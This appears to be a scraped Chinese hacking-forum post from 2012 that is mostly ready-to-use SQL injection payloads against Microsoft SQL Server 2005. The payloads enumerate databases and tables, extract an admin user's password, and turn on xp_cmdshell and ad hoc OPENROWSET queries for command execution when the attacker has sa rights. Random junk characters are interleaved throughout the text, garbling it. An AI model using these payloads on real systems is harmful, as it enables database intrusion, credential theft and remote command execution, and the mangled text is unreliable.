( l% ?7 V; ~$ g( S, A; `7 M) I) P3 l/ I6 C* }; K
; y6 Z) V) t& u/ S: N[Copy to clipboard]CODE:
4 V Z5 G0 v6 x7 z: F/**/and/**/(select/**/top/**/1/**/isnull(cast([name]/**/as/**/nvarchar(500)),char(32))%2bchar(124)/**/from/**/[master].[dbo].[sysdatabases]/**/where/**/dbid/**/in/**/(select/**/top/**/1/**/dbid/**/from/**/[master].[dbo].[sysdatabases]/**/order/**/by/**/dbid/**/desc))%3d0--
- H; U& G& e8 R0 y- O# x
. X) K9 Q& e5 t3 I爆表语句,somedb部份是所要列的数据库,红色数字1累加
X/ Q% Y5 [( k6 C! w5 g
9 P+ O/ G( l, }' X& d$ ~! A0 p/ r9 s1 ^3 Z$ N
[Copy to clipboard]CODE:- B7 | A8 r& g
/**/and/**/(select/**/top/**/1/**/cast(name/**/as/**/varchar(200))/**/from/**/(select/**/top/**/1/**/name/**/from/**/somedb.sys.all_objects/**/where/**/type%3dchar(85)/**/order/**/by/**/name)/**/t/**/order/**/by/**/name/**/desc)%3d0--% \/ H# U; t8 u& X4 J' V t
# _) b4 K4 N1 A' c爆字段语句,爆表admin里user='icerover'的密码段6 p0 ]$ Q: M O* g) |) a, h7 @, T- K
& }$ P* D1 ]4 A9 \5 e+ [* l) `* r0 c% O9 v Z7 `# e
[Copy to clipboard]CODE:
4 b% N( D! |$ K1 ^' T; a* @) I**/And/**/(Select/**/Top/**/1/**/isNull(cast([password]/**/as/**/varchar(2000)),char(32))%2bchar(124)/**/From/**/(Select/**/Top/**/1/**/[password]/**/From/**/[somedb]..[admin]/**/Where/**/user='icerover'/**/Order/**/by/**/[password])/**/T/**/Order/**/by/**/[password]Desc)%3d0--) R, \( H# U& n5 }: _8 b
6 [: G% C+ B9 s' [mssql2005默认没有开xp_cmdshell的,openrowset也不能用
1 F! a) N. }( W如果是sa权限,可以这样来开启
3 _: ^% W( W" P+ e- A+ z开启openrowset
4 K' v3 c% G; u' s% v1 ]# B% K5 Q2 Y% l$ F7 t) l
3 x; J" g& R& [% a4 E
[Copy to clipboard]CODE:
7 g9 E. |2 y/ n/**/sp_configure/**/'show/**/advanced/**/options',/**/1;RECONFIGURE;--
6 @: c9 F" g0 _. P! i @- i/**/sp_configure/**/'Ad/**/Hoc/**/Distributed/**/Queries',/**/1;RECONFIGURE;--
. D* G5 I1 Z9 c7 C" v, q3 Y8 D7 m6 V( p
开启xp_cmdshell
$ W7 F( A8 Q3 S. _3 h3 K
9 J `% n7 I' e I0 f5 C4 T3 W# y4 D( ]6 G! K" h
[Copy to clipboard]CODE:0 `/ d/ B& i6 O; C2 L# Z
EXEC/**/sp_configure/**/'Ad/**/Hoc/**/Distributed/**/Queries',1;RECONFIGURE;--
K+ X7 `4 ^' R6 p2 O8 yEXEC/**/sp_configure/**/'show/**/advanced/**/options',1;RECONFIGURE;EXEC/**/sp_configure/**/'xp_cmdshell',1;RECONFIGURE;--
3 w) G2 c4 ?6 i: Q! k, ]: _4 |2 R+ B* F* d0 X! T- q2 s0 ~
ok,over~~晚安, p, J, L a- B7 w
|
发表于 2012-9-13 17:19:47
收藏
支持
反对